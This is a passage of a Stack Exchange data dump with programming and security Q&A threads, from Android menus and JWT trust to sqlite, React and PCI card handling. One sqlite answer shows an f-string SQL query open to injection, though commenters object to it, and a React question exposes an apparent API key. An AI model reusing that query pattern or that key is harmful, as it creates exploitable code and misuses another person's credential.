mDrawerList.setAdapter(adapter);\n getActionBar().setDisplayHomeAsUpEnabled(true);\n getActionBar().setHomeButtonEnabled(true);\n mDrawerToggle = new ActionBarDrawerToggle(this, mDrawerLayout,\n R.drawable.ic_drawer, \n R.string.app_name, \n R.string.app_name \n )\n{\npublic void onDrawerClosed(View view) {\ngetActionBar().setTitle(mTitle);\ninvalidateOptionsMenu();\n }\n public void onDrawerOpened(View drawerView) {\n getActionBar().setTitle(mDrawerTitle);\n invalidateOptionsMenu();\n}\n};\nmDrawerLayout.setDrawerListener(mDrawerToggle);\nif (savedInstanceState == null) {\ndisplayView(0);\n }\n}\n\nprivate class SlideMenuClickListener implements\n ListView.OnItemClickListener {\n @Override\n public void onItemClick(AdapterView<?> parent, View view, int position,long id) \n{\ndisplayView(position);}\n}\n\npublic boolean onCreateOptionsMenu(Menu menu) {\n MenuInflater inflater = getMenuInflater();\n inflater.inflate(R.layout.menu, menu);\n menu.getItem(0).getSubMenu();\n return true;\n}\n\nprivate void displayView(int position) {\n\n Fragment fragment = null;\n switch (position) {\n case 0:\n fragment = new HomeFragment();\n break;\n case 1:\n fragment = 
BackupFragment.getInstance();\n break;\n case 2:\n fragment = new RestoreFragment();\n break;\n default:\n break;\n }\n if (fragment != null) {\n FragmentManager fragmentManager = getFragmentManager();\n fragmentManager.beginTransaction()\n .replace(R.id.frame_container, fragment).commit();\n mDrawerList.setItemChecked(position, true);\n mDrawerList.setSelection(position);\n setTitle(navMenuTitles[position]);\n mDrawerLayout.closeDrawer(mDrawerList);\n } else {\n \/\/erreur de creation de fraglent\n Log.e(\"MainActivity\", \"Error in creating fragment\");\n }\n}\n@Override\npublic void setTitle(CharSequence title) {\n mTitle = title;\n getActionBar().setTitle(mTitle);\n}\n@Override\nprotected void onPostCreate(Bundle savedInstanceState) {\n super.onPostCreate(savedInstanceState);\n mDrawerToggle.syncState();\n}\n@Override\npublic void onConfigurationChanged(Configuration newConfig) {\n super.onConfigurationChanged(newConfig);\n mDrawerToggle.onConfigurationChanged(newConfig);\n}\n<\/code>\n}\nComment: Maybe some functions are only enabled for a certain versions of android, but it is only a guess 'cause you're not providing an example. Please, share some code.\nComment: I edited my post so you can now my code . It is working well in a 3.0 device'version but when I change to a lower version device it craches !!!\nAnswer: Use the MenuDrawer library. Works great!\nComment: Then it should not be a problem, MenuDrawer works in API 7 and up.\nAnswer: Your app crashes because <code>ActionBar<\/code> is not suported below Honeycomb (3.0).\nTo avoid this problem you must use the support library.\nTo have a better explanation:\n<code>The ActionBar APIs were first added in Android 3.0 (API level 11) but they are also available in the Support Library for compatibility with Android 2.1 (API level 7) and above.\n\n**Caution:** Be certain you import the ActionBar class (and related APIs) from the appropriate package:\n<\/code>\n\nIf supporting API levels lower than 11: \n<code>import android.support.v7.app.ActionBar<\/code>\nIf supporting only API level 11 and higher: \n<code>import android.app.ActionBar<\/code>\n\nHope it helps!!\nComment: Yes that it the problem it it added in Android 3.0.\n\nNow when I add \"import android.support.v7.app.ActionBar \"\nI get this error:\nThe import android.support.v7 cannot be resolved\nComment: Fist of all, you must setup the support library (take a look at the link in my answer); and then you must instanciate the `ActionBar` calling `getSupportActionBar()` instead of `getActionBar()`\nComment: Make sure you have set up correctly the support library.\nComment: Have you read the link in my answer? It's everything there step-by- step.\n","meta":{"source":"stackoverflow","title":"Sliding Menu in android","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why should I trust a JSON Web Token (JWT)?\n\nQuestion: In the SAML and Kerberos authentication models, there is an explicit understanding of what authority has authenticated the user and issued the credential to be trusted by downstream systems. For purposes of identity propagation, the rights of the downstream system to impersonate the user can be tightly controlled within the solution architecture and the associated identity domains.\nAs far as I can tell, the completeness of the SAML and Kerberos models is not part of the JWT approach. JWT appears to be a mechanism that provides functionality quite similar to Kerberos, but without the supporting functionality of a defined KDE. \nAm I missing something? 
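\nFor reference, my working mental model is that a JWT is nothing more than two base64url-encoded JSON parts plus a signature over them, along the lines of this standard-library-only sketch (purely illustrative, not any particular library's API):\n<code>import base64, hashlib, hmac, json\n\ndef b64url(data):\n    return base64.urlsafe_b64encode(data).rstrip(b\"=\").decode()\n\ndef make_jwt(claims, key):\n    header = b64url(json.dumps({\"alg\": \"HS256\", \"typ\": \"JWT\"}).encode())\n    payload = b64url(json.dumps(claims).encode())\n    signature = b64url(hmac.new(key, (header + \".\" + payload).encode(), hashlib.sha256).digest())\n    return header + \".\" + payload + \".\" + signature\n\ntoken = make_jwt({\"iss\": \"idp.example\", \"aud\": \"api.example\", \"sub\": \"alice\"}, b\"shared-secret\")\n<\/code>\nAnyone holding the key can verify such a token, but nothing in the token itself tells me which issuers should be trusted in the first place.\n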
Is JWT based on a \"web of trust\" or is each JWT implementation responsible for defining its own trustable authentication mechanism and so on?\nAnswer: So, a JWT is just a token. It's not a protocol. As such you really can't compare the SAML protocol to a JWT as that would be like comparing apples to ducks. \nA JWT is just a bunch of identifying information signed by a cryptographic key. What you actually put in it is up to the protocol. There are some formal requirements that distinguish a JWT from a JWS object like issuer and audience information, but that information is still arbitrary. Comparatively SAML tokens and Kerberos tickets do have a bit more structure to them, but that's not to say you can't add the same information to a JWT.\nProtocols on the other hand are a bit trickier to compare.\nThe two protocols people generally think about are OAuth2 and OpenID Connect. Both can and do use JWTs as their token. OAuth2 often uses JWTs as an authorization mechanism -- the presence of the JWT and the claims in the JWT determine what sort of permissions the caller has against a protected resource. It has nothing to do with identifying the user. Conversely a protocol like WS-Federation uses SAML tokens by default to provide identifying information about the user, but can use JWTs as drop in replacements (so long as all parties understand the format) because you can put the same information into the JWT body.\nComment: In this case, maybe I'm comparing a duck to a bill. The duck's bill is an important component, but without a number of other components you don't have a viable beast! That was really the point I was getting at with this question. JWT isn't a solution and building the pieces that would constitute a complete solution is a lot of our-of-scope work for most development efforts. **Thanks for the answer**, you have confirmed my impression, which is what I needed. [Don't let me get started on OAuth2! IMO, it is a poorly written framework, rather than a protocol, but hey, that's just me!]\nComment: @JaimeCastells ah well, analogies lose meaning too easily. You're not wrong -- JWT isn't a solution on its own. BUT as a part of bigger solution they are WAY more useful than (say) SAML tokens because of simplicity and portability.\n","meta":{"source":"security.stackexchange","title":"Why should I trust a JSON Web Token (JWT)?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Need to send response status code right away with FastAPI while keeping jobs synchronously in the background\n\nQuestion: I have a very time consuming task (image processing) which receives some input data from a request given to a FastAPI endpoint. In order to keep the caller responsive I need to send an instant response message like \"ok\" along with a 201 status code (the latter optional). \nSo far I've been using this:\n<code>from fastapi import BackgroundTasks, FastAPI\n\napp = FastAPI()\n\ndef main_process(parameters)\n...some long task\n\n@app.post('\/task')\nasync def do_task(reference_id: int,\n bucket: str,\n document_url: str,\n return_url: str,\n background_tasks: BackgroundTasks):\n\n background_tasks.add_task(main_process, bucket, document_url, reference_id, return_url)\n return 'ok'\n<\/code>\nEach <code>main_process<\/code> task downloads an image from a bucket in S3 and then does some processing. The solution shown above works ok until it reaches like 10 images processed asynchronously (given async def) and then it crashes. 
\nI've tried increasing some gunicorn parameters as well, like <code>max-requests<\/code> to 100, like this:\n<code>gunicorn api:app -b 0.0.0.0:8000 -w 4 -k uvicorn.workers.UvicornWorker --preload --max-requests 100 --daemon\n<\/code>\nWhich gave me more room to process (20 more images), but it crashes anyway.\nI've also considered using Celery or some distributed task queue solution, but I want to keep things as simple as possible.\nSince async behaviour is not crucial, but instant response is, is it possible to switch to a synchronous solution but having an \"ok\" response right away? \nAnswer: No, you'll have to really dispatch the task and delegate it to some processing backend. Such backend can be quite simple, e.g. just a task queue (celery\/amqp, redis, a relational database, whatever suits your needs) and at least one process consuming that queue, performing the calculation and feeding the result back into the storage.\nWhen you dispatch the request from your API, generate a UUID at the same time and store it alongside your calculation job in the queue. When you feed back your quick 200 OK to the caller, also provide them their job's UUID (if required). They'll hit your API again querying for a result; have them provide the UUID and use it to look for a result in your storage backend.\nTo avoid calculating the same request twice, generate a hash from the request and use that instead of the UUID (watch for collision, you want some longer hashes). That works easily as long as you don't have to cope with user\/image permissions.\nComment: Thanks jbndlr. I agree. In the end this service is suposed to work asynchronously, so I ended up using a simple task queue and a good combination of async \/ await in my code.\n","meta":{"source":"stackoverflow","title":"Need to send response status code right away with FastAPI while keeping jobs synchronously in the background","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is it possible to construct a PRNG where the output numbers have a certain distribution of hamming weights?\n\nQuestion: I am in need of a non-uniform random number generator where each n-bit output has a hamming weight with a certain binomial distribution.\nFor example, I would like a non-uniform PRNG which generates 32-bit outputs with a hamming weight whose binomial distribution is n=32, p=0.1. For instance, 0xFF should be output with significantly less probability than 0x200, which in turn should have the same probability as 0x1. \nPerhaps I can modify the output of a PRNG like xorshift or a LFSR to accomodate for this? I thought about rejection sampling the output, but the distribution of hamming weights for a uniform PRNG does not necessarily envelope a given binominal distribution with a variable parameter p, especially when p << 0.5.\nI am not concerned about the cryptographic quality of the output. However, I am working on a 8 bit microcontroller with 2 KB SRAM, so memory and speed are both my primary concern. In the most naive case, I would just generate an array of random numbers and convert each element to 0 and 1 given a threshold probability, and finally convert this resulting array of 0's and 1's to an integer. But I would really, really like to avoid this memory overhead of an n-element array. \nComment: You don't need to store an N-element array, you can update your integer bit by bit on the fly. 
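\nIn Python the bit-by-bit idea looks roughly like this (illustrative sketch; on the microcontroller the same loop would use the platform RNG instead of <code>random<\/code>):\n<code>import random\n\ndef biased_word(bits=32, p=0.1):\n    word = 0\n    for _ in range(bits):\n        word = (word << 1) | (1 if random.random() < p else 0)\n    return word\n<\/code>\n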
Since order doesn't matter you can just do this: `output = (output << 1) | (1 or 0)`, 32 times or as many times as needed, shifting the bits in as you go.\nAnswer: The obvious way to do this is to generate N words, and use logical operations to combine them in a single word such that each bit of the output word is a 1 with probability approximately 0.1 (and the individual bits are uncorrelated).\nIn the simplest case, you could generate 3 words, and just AND them together into a single one. In C, this would be:\n<code> r1 = rand();\n r2 = rand();\n r3 = rand();\n return r1 & r2 & r3;\n<\/code>\nThis gives each bit set with probability 0.125, which is close to 0.1\nIf that's not quite close enough, you can get a closer approximation by using more bits; for example, <code>r1 & r2 & r3 & ~(r4 & r5)<\/code> results with bits set with probability $3\/32 = 0.09375$\nWith this technique, you use $n$ random words to generate bits set with probability $k 2^{-n}$ for some integer $k$; this can be made arbitrarily close to 0.1.\nThis obviously uses minimal memory; the computation time isn't too bad (assuming your rand implementation is cheap), unless you insist on a quite good approximation to your target probability.\nAnd, while I said 'words', your implementation would use whatever size it finds most convenient; for an 8 bit CPU, each word might be 8 bits (and you just do it 4 times to generate the required 32 bits).\nComment: An approximate probability for each Bernoulli trial is perfectly fine for my application. Interesting technique that can scale in accuracy with the number of words - Thanks!\nComment: @Ollie: you just need to make sure that adjacent calls to the underlying rng don't have strong bit correlations; an LFSR-based rng might, a linear congruential (state = a*state + b mod m for m odd) one would be less likely to cause problems\nComment: Sorry for raising this thread from the dead. Quick question: Is there a name in the academic literature for this technique of using combinations of bitwise-and and bitwise-or to approximate bit probabilities? I can see that for probability $k \\cdot 2^{-n}$ that the binary representation of any general k forms a radix tree (bitwise trie). And that this radix tree can be used to find the correct sequence of and\/or instructions for an arbitrarily large n. This allows unlimited precision in approximating the probability, given enough RAM. 
I'm wondering if this idea is well known?\nComment: @Ollie: I don't know of a reference to this approach in the published literature\nComment: Worth a shot, thanks anyways!\n","meta":{"source":"crypto.stackexchange","title":"Is it possible to construct a PRNG where the output numbers have a certain distribution of hamming weights?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Can't update a value in sqlite3\n\nQuestion: I have some data in an sqlite3 database, I made an input to be a command to update that data.\nfor some reason when I run that command it does not work and gives me an sqlite3.OperationalError: no such column: \"some lettres\"\nmy function to update the data: (the generate_pwd() function works just fine and it has been tested)\n<code> def update_query(self, wbname):\n \"\"\"this function enables the user to update a query\n\n Args:\n wbname (str): the website name to change the pass\n \"\"\"\n with conn:\n newpwd = go.generate_pwd()\n c.execute(f\"UPDATE password_list SET password={newpwd} WHERE website_name={wbname}\")\n pass\n<\/code>\nmy elif statement to make the command:\n<code>elif command == \"u\":\n wbname = input(\"Enter the site name: \")\n co.update_query(wbname)\n<\/code>\n\nI hope it is clear enough, If you need any further data on my problem just type in the comments.\nAnswer: You can't use f-strings with SQL.\nUse parametrized queries as explained in the docs instead:\n<code>c.execute(f\"UPDATE password_list SET password=? WHERE website_name=?\", (newpwd, wbname))\n<\/code>\nComment: Waiting for the seven minutes to pass so I can confirm your answer\nComment: JFTR, \"You can't use f-strings with SQL\" is not quite right. You can do it. But \"THOU SHALT NOT FORMAT PARAMETERS YOURSELVES\" is true of course.\nAnswer: You need to wrap string values in the query within single quotes, otherwise they will be interpreted as column objects:\n<code>c.execute(f\"UPDATE password_list SET password='{newpwd}' WHERE website_name='{wbname}'\")\n<\/code>\nYou might want to use a parameterized query instead of building a query string. That way your query is less vulnerable to SQL injections.\nAs parameters you can pass an interable object, e.g. a tuple or a list.\n<code>c.execute(\"UPDATE password_list SET password=? WHERE website_name=?\", [newpwd, wbname])\n<\/code>\nYou could also use named-style parameters:\n<code>c.execute(\"UPDATE password_list SET password=:pw WHERE website_name=:wbname\", {\"pw\": newpwd, \"wbname\": wbname})\n<\/code>\nAnother advantage of using parameterized queries is that you do not have to worry about wrapping strings in single quotes.\nComment: Never do this with SQL; it will be vulnerable to SQL injection attacks.\nComment: Obviously the input isn't sanizized and there is no reason to use something other than a parameterized version of the SQL statement here. Of course it's good to explain what was wrong, but the solution should show how it's done. Yes, I can show someone how to use a hammer to put a screw in a screw anchor, but it would be better if I teach them how to use a screwdriver.\nComment: Not if you sanitize your inputs. This is nonethelesse a valid answer and it explains why OP gets the ``no such column`` exception. While \"You can't use f-strings with SQL.\" is wrong. The f-string is evaluated before it's passed to the sql engine.\nComment: @MikeScotty Sanitization is not the right approach, correct quoting would be. 
But you can't generally know better how to quote a string than the SQL engine itself can.\n","meta":{"source":"stackoverflow","title":"Can't update a value in sqlite3","dup_signals":{}},"subset":"stackexchange"} +{"text":"SQL Server : complicated query\n\nQuestion: I have two tables <code>document<\/code> and <code>documentd<\/code>; the first one contains the numbers of the invoices <code>doc_num<\/code> as primary key, document types <code>doc_type<\/code> (FACA, BLCO, BLCM, BLCK .....) and the document date <code>doc_date<\/code>.\nEach invoice has one <code>DOC_TYPE<\/code> and one date, and each date my be contained in one or more invoices.\nTable <code>DOCUMENT<\/code>:\n\nDOC_NUM\nDOC_TYPE\nDOC_DATE\n\nINVOICE1901221\nFACA\n22\/01\/2019\n\nINVOICE1902221\nFACA\n22\/02\/2019\n\nINVOICE1902222\nFACA\n22\/02\/2019\n\nINVOICE1903221\nFACA\n22\/03\/2019\n\nBLCO190122001\nBLCO\n22\/01\/2019\n\nBLCO190123001\nBLCO\n23\/01\/2019\n\nBLCM190122001\nBLCM\n22\/01\/2019\n\nINVOICE1901021\nFACA\n02\/01\/2019\n\nINVOICE1903011\nFACA\n01\/03\/2019\n\nINVOICE1904221\nFACA\n22\/04\/2019\n\nINVOICE1904222\nFACA\n22\/04\/2019\n\nThe second table is the details of each invoices he contains as foreign key <code>doc_num<\/code> the code of products for each invoice <code>art_code<\/code> and finally the prices of the products <code>art_price<\/code>.\nTable <code>DOCUMENTD<\/code>:\n\nDOC_NUM\nART_CODE\nART_PRICE\n\nINVOICE1901221\nPRODUCT1\n1000\n\nINVOICE1901221\nPRODUCT2\n2000\n\nINVOICE1902221\nPRODUCT3\n950\n\nINVOICE1902221\nPRODUCT4\n980\n\nINVOICE1904221\nPRODUCT1\n1200\n\nINVOICE1903011\nPRODUCT2\n900\n\nBLCO190122001\nARTICLE1\n900\n\nBLCO190123001\nARTICLE2\n800\n\n[DOCUMENTD TABLE][2]\nMy goal in first step is to join the two tables using <code>doc_num<\/code> selects all <code>FACA<\/code> type invoices and their products except the prices they must be THE LAST UPDATED PRICE IN FACA TYPE.\nRESULT:\n\nINVOICE1904221\nPRODUCT1\n1200\n22\/04\/2019\n\nINVOICE1903011\nPRODUCT2\n900\n01\/03\/2019\n\nINVOICE1902221\nPRODUCT3\n950\n22\/02\/2019\n\nINVOICE1902221\nPRODUCT4\n980\n22\/02\/2019\n\nThe second step I have another table how contain <code>ORDER<\/code> and <code>ART_CODE<\/code>:\n\nORDER\nART_CODE\n\n1\nPRODUCT1\n\n2\nPRODUCT2\n\n3\nPRODUCT3\n\nI want to fetch the first result depend on this table:\n\nINVOICE1904221\nPRODUCT1\n1200\n22\/04\/2019\n\nINVOICE1903011\nPRODUCT2\n900\n01\/03\/2019\n\nINVOICE1902221\nPRODUCT3\n950\n22\/02\/2019\n\nI try this but he fetch same product with different prices\n<code>SELECT \n d1.DOC_NUM, dd1.ART_CODE, dd2.ART_PRICE, d2.DOC_DATE \nFROM\n document d1 \nINNER JOIN \n documentd dd1 ON dd1.DOC_NUM = d1.DOC_NUM\nINNER JOIN \n documentd dd2 ON dd2.ART_CODE = dd1.ART_CODE\nINNER JOIN \n document d2 ON d2.DOC_NUM = dd2.DOC_NUM \n AND d2.DOC_TYPE <> d1.DOC_TYPE\nWHERE \n d1.DOC_TYPE = 'FACA'\n<\/code>\nComment: I do not understand `...except the prices they must be THE LAST UPDATED PRICE IN FACA TYPE`. What do you mean by that? Furthermore I do not understand the sense of that one: `The second step I have another table how contain ORDER and ART_CODE`, what means that? What is this table for? You are not joining it.\nComment: I want to select from the **DOCUMENTD** table the products with the last price depend on the newest date from **DOCUMENT** table and with **DOC_TYPE** FACA and show only the products who existed in the last table\nAnswer: @MOHAMED NEJI it's really hard to understand what you meant. 
Please try to be more clear on your questions.\nThe proposed solution below shows how to get the results you asked in both RESULTS tables with the input data that you gave.\n<code>CREATE TABLE #DOCUMENT (\n DOC_NUM VARCHAR(30)\n , DOC_TYPE CHAR(4)\n , DOC_DATE DATE)\nCREATE TABLE #DOCUMENTD (\n DOC_NUM VARCHAR(30)\n , ART_CODE VARCHAR(20)\n , ART_PRICE DECIMAL(10,4))\nCREATE TABLE #OTHERTABLE(\n [ORDER] int \n , ART_CODE VARCHAR(20)\n)\n\nINSERT INTO #DOCUMENT\n SELECT 'INVOICE1901221' DOC_NUM, 'FACA' DOC_TYPE, '2019-01-22' DOC_DATE\nUNION ALL SELECT 'INVOICE1902221' DOC_NUM, 'FACA' DOC_TYPE, '2019-02-22' DOC_DATE\nUNION ALL SELECT 'INVOICE1902222' DOC_NUM, 'FACA' DOC_TYPE, '2019-02-22' DOC_DATE\nUNION ALL SELECT 'INVOICE1903221' DOC_NUM, 'FACA' DOC_TYPE, '2019-03-22' DOC_DATE\nUNION ALL SELECT 'BLCO190122001' DOC_NUM, 'BLCO' DOC_TYPE, '2019-01-22' DOC_DATE\nUNION ALL SELECT 'BLCO190123001' DOC_NUM, 'BLCO' DOC_TYPE, '2019-01-23' DOC_DATE\nUNION ALL SELECT 'BLCM190122001' DOC_NUM, 'BLCM' DOC_TYPE, '2019-01-22' DOC_DATE\nUNION ALL SELECT 'INVOICE1901021' DOC_NUM, 'FACA' DOC_TYPE, '2019-01-02' DOC_DATE\nUNION ALL SELECT 'INVOICE1903011' DOC_NUM, 'FACA' DOC_TYPE, '2019-03-01' DOC_DATE\nUNION ALL SELECT 'INVOICE1904221' DOC_NUM, 'FACA' DOC_TYPE, '2019-04-22' DOC_DATE\nUNION ALL SELECT 'INVOICE1904222' DOC_NUM, 'FACA' DOC_TYPE, '2019-04-22' DOC_DATE\n\nINSERT INTO #DOCUMENTD\n SELECT 'INVOICE1901221' DOC_NUM, 'PRODUCT1' ART_CODE, 1000 ATR_PRICE\nUNION ALL SELECT 'INVOICE1901221' DOC_NUM, 'PRODUCT2' ART_CODE, 2000 ATR_PRICE\nUNION ALL SELECT 'INVOICE1902221' DOC_NUM, 'PRODUCT3' ART_CODE, 950 ATR_PRICE\nUNION ALL SELECT 'INVOICE1902221' DOC_NUM, 'PRODUCT4' ART_CODE, 980 ATR_PRICE\nUNION ALL SELECT 'INVOICE1904221' DOC_NUM, 'PRODUCT1' ART_CODE, 1200 ATR_PRICE\nUNION ALL SELECT 'INVOICE1903011' DOC_NUM, 'PRODUCT2' ART_CODE, 900 ATR_PRICE\nUNION ALL SELECT 'BLCO190122001' DOC_NUM, 'ARTICLE1' ART_CODE, 900 ATR_PRICE\nUNION ALL SELECT 'BLCO190123001' DOC_NUM, 'ARTICLE2' ART_CODE, 800 ATR_PRICE\n\nINSERT INTO #OTHERTABLE\n SELECT 1 [ORDER], 'PRODUCT1' ART_CODE\nUNION ALL SELECT 2 [ORDER], 'PRODUCT2' ART_CODE\nUNION ALL SELECT 3 [ORDER], 'PRODUCT3' ART_CODE\n\n;WITH Docs AS (\n SELECT dd.DOC_NUM, dd.ART_CODE, dd.ART_PRICE, d.DOC_DATE ,ROW_NUMBER() OVER (PARTITION BY art_code ORDER BY DOC_DATE DESC ) rn\n FROM #DOCUMENTD dd\n INNER JOIN #DOCUMENT d \n ON d.DOC_NUM = dd.DOC_NUM\n WHERE DOC_TYPE = 'FACA'\n)\nSELECT DOC_NUM, ART_CODE, ART_PRICE, DOC_DATE \nFROM Docs\nWHERE rn = 1\n\n;WITH Docs AS (\n SELECT dd.DOC_NUM, dd.ART_CODE, dd.ART_PRICE, d.DOC_DATE ,ROW_NUMBER() OVER (PARTITION BY art_code ORDER BY DOC_DATE DESC ) rn\n FROM #DOCUMENTD dd\n INNER JOIN #DOCUMENT d \n ON d.DOC_NUM = dd.DOC_NUM\n WHERE DOC_TYPE = 'FACA'\n)\nSELECT DOC_NUM, Docs.ART_CODE, ART_PRICE, DOC_DATE \nFROM Docs\nINNER JOIN #OTHERTABLE ot\n ON ot.ART_CODE = Docs.ART_CODE\nWHERE rn = 1\n<\/code>\n","meta":{"source":"stackoverflow","title":"SQL Server : complicated query","dup_signals":{}},"subset":"stackexchange"} +{"text":"Placing QR code scanner in a Fragment\n\nQuestion: I am using an android QR code processing library - android QR code.\n I am extending the DecoderActivity for scanner and now I want the scanner to be inside a fragment, I have used <code>LocalActivityManager<\/code> to embed Activity inside a fragment. 
Here is the code:\n<code>public class QrCodeProcessorFragment extends SherlockFragment {\n\nprivate static final String KEY_STATE_BUNDLE = \"localActivityManagerState\";\n\nprivate LocalActivityManager mLocalActivityManager;\n\nButton generate_qr_code;\n\nprivate QuickPayManagerActivity parent;\n\nprotected LocalActivityManager getLocalActivityManager() {\n return mLocalActivityManager;\n}\n\n@Override\npublic void onCreate(Bundle savedInstanceState) {\n super.onCreate(savedInstanceState);\n\n Bundle state = null;\n if (savedInstanceState != null) {\n state = savedInstanceState.getBundle(KEY_STATE_BUNDLE);\n }\n\n mLocalActivityManager = new LocalActivityManager(getActivity(), true);\n mLocalActivityManager.dispatchCreate(state);\n}\n\npublic View onCreateView(LayoutInflater inflater, ViewGroup container,\n Bundle savedInstanceState) {\n \/\/ This is where you specify you activity class\n Intent i = new Intent(getSherlockActivity(), CaptureActivity.class);\n Window w = mLocalActivityManager.startActivity(\"tag\", i);\n View currentView = w.getDecorView();\n ViewGroup vg = (ViewGroup) (currentView.getParent());\n if (vg != null)\n vg.removeView(currentView);\n\n currentView.setVisibility(View.VISIBLE);\n currentView.setFocusableInTouchMode(true);\n ((ViewGroup) currentView)\n .setDescendantFocusability(ViewGroup.FOCUS_AFTER_DESCENDANTS);\n\n return currentView;\n}\n\n@Override\npublic void onSaveInstanceState(Bundle outState) {\n super.onSaveInstanceState(outState);\n outState.putBundle(KEY_STATE_BUNDLE,\n mLocalActivityManager.saveInstanceState());\n}\n\n@Override\npublic void onResume() {\n System.out.println(\"lam onresume\");\n super.onResume();\n mLocalActivityManager.dispatchResume();\n}\n\n@Override\npublic void onPause() {\n System.out.println(\"lam onpause\");\n super.onPause();\n mLocalActivityManager.dispatchPause(getActivity().isFinishing());\n}\n\n@Override\npublic void onStop() {\n super.onStop();\n mLocalActivityManager.dispatchStop();\n}\n\n@Override\npublic void onDestroy() {\n super.onDestroy();\n mLocalActivityManager.dispatchDestroy(getActivity().isFinishing());\n}}\n<\/code>\nQR scanner is not working now. I debugged the library code, it is expecting an activity instance and I am passing the activity instance which is inside the fragment. Hope I am clear on this. Please help!\nAnswer: I found a library called Barcode Fragment library which uses a fragment for hosting the scanner functionality. Works fine but hasn't supported portrait mode support, I have done changes to library as suggested in here. It worked like a charm :)\nComment: Can you please share the code for that ? the second link on your answer does not seems to be working anymore.\n","meta":{"source":"stackoverflow","title":"Placing QR code scanner in a Fragment","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why I am getting these error during fetch api?\n\nQuestion: I was trying to fetch the news API but I keep on getting this error\n<code>TypeError: Cannot read properties of undefined (reading 'map')<\/code> is there any syntax or do I need to add something?\nPlease help me with this.\n<code> import React, { Component } from 'react'\n import NewsItem from '.\/NewsItem'\n export default class News extends Component {\n constructor(){\n super();\n this.state={\n article : this.article\n }\n }\n \n async componentDidMount(){\n let urll = \"https:\/\/newsapi.org\/v2\/top-headlines? 
\n country=in&apiKey=6aeca0faebbd45c1a1ec3c463f703ebb\";\n let data = await fetch(urll); \n console.log(data)\n let parseData = await data.json() ; \n console.log(parseData);\n this.setState({article : parseData.articles});\n }\n \n render() {\n return (\n <div className='newcontainer my-5'>\n <h1 className='mainheading' >PAHADI PRESS BREAKING NEWS<\/h1>\n {this.state.article.map((e)=>{\n return <div key={e.url} >\n <NewsItem title={e.title} decription={e.description} imageUrl={e.urlToImage} \n newsUrl={e.url}\n newsauthor={e.author}\/>\n <\/div>\n })\n }\n <\/div>\n )\n }\n }\n<\/code>\nYou can see in this image of the console what error I am getting->>\n[1]: https:\/\/i.stack.imgur.com\/eOWkx.png\nComment: The error is indicating that whatever you're calling `map()` on is `undefined`. So it looks like the `this.state.article` property is `undefined` by the time it is rendered. Make sure that you're initializing it as an array as expected every where you change your state.\nComment: Yes you are right when I am adding the api data manually in the file then everything seems fine, can you tell me how to make sure that it remains an arrray, or what I need to change in the code?\nComment: @Ankit Can you show in the post what shows your `console.log()` ?\nComment: David though the problem is solved but I will still show you the console if you are interested, moreover the console.log() didnt show anything after some time initiallt it was showing the arry. I have added the image in the question.\nAnswer: Your <code>article<\/code> state is not initialized. Make sure that you do that before the component renders.\nInstead, you can use the optional chaining <code>?.<\/code> operator when calling the <code>map<\/code> method to not cause an error if <code>this.state.article<\/code> is nullish (<code>null<\/code> or <code>undefined<\/code>).\nExample: <code>this.state.article?.map(...)<\/code>\nComment: I did this \" this.state?.article.map(...) \" but the error is still there, how really I have to initilize the article. I want to make sure that it works everytime and I dont need to check if that is array or not\nComment: Sorry, it is `this.state.article?.map(...)`. I have updated my answer, check it again.\nComment: Put `?.` before calling the `map` method since `article` is `undefined` at component mount.\nComment: Using `?.` operator in this case will just return `undefined` instead of causing an error for calling a method on an `undefined` value.\nComment: Thank You I have initilized the article and the problem is gone.\nAnswer: As pointed out in Tarek's answer, the <code>article<\/code> state is not initialized. The problem arises from the constructor, where you assign <code>{article: this.article}<\/code> to the state.\nIn the constructor, the instance is not yet accessible, it is indeed being constructed, which means that <code>this.article<\/code> does not exist yet, thus assigning <code>undefined<\/code> to the state.\nYou can instead assign it a default value, like an empty array: <code>this.state = {article: []}<\/code>. This should fix your problem.\n<code>componentDidMount<\/code> is called after <code>render<\/code>, but you populate the state in <code>componentDidMount<\/code> and try to access it in <code>render<\/code>. 
<code>this.state.article<\/code> will thus always be <code>undefined<\/code> for a short period of time, causing the error you mentioned.\nComment: Thank you very much the problem is gone and thank you for this information.\n","meta":{"source":"stackoverflow","title":"Why I am getting these error during fetch api?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to submit credit card info to a separate server\/website (PCI)\n\nQuestion: My company has a website\/service that stores\/processes credit cards and is PCI compliant (Site A). We also have websites with storefronts that need to submit credit card data to that site for processing (Site B). When someone orders something on Site B, and enters their billing information, how do I submit that information to Site A and remain PCI compliant?\nObviously they're on a secure page on Site B, when they are entering their billing details.\nCan I just post the form to a secure page on Site A from a secure page on Site B? Do I need to encrypt the credit card during this transaction? Obviously it is stored in some sort of encrypted state, but does it need to be encrypted during the submit transaction?\nDo I need to setup some sort of handshake between the websites, like a secret key? If so, what would be a secure way to create that key\/handshake?\nWe've been reading and reading about PCI compliance trying to find concrete answers, but it seems kindof subjective, and obscure what we are supposed to be doing.\nThis question is also currently posted on StackOverflow.\nComment: Perhaps not a repeat of this question -- but my answer here provides valuable PCI Scoping information -- http:\/\/security.stackexchange.com\/questions\/2922\/why-doesnt-the-clients-web-browser-need-to-be-pci-compliant\/2933#2933\nAnswer: The PCI DSS applies to any system which stores, processes or transmits cardholder data. In the scenario you describe above, to the letter of the law, you would need to apply the standard to all systems and networks which make up Site B.\nAs you are not storing cardholder data in Site B this will at least reduce the amount of work you would need to cover as, for example, as far as I can see, the whole of \"Requirement 3 - Protect stored cardholder data\" would be N\/A.\nYou will however need to ensure that things like your firewall\/DMZ architecture is appropriately put together and managed (Requirement 1), that cardholder data is encrypted in transmission if the connection between Site A and Site B is over an \"open, public network\" like the Internet.\nPicking up your point, and to echo @Rook, SSL will be fine for this purpose (see Requirement 4.1). You do not need to hash or encrypt the card data at this point. 
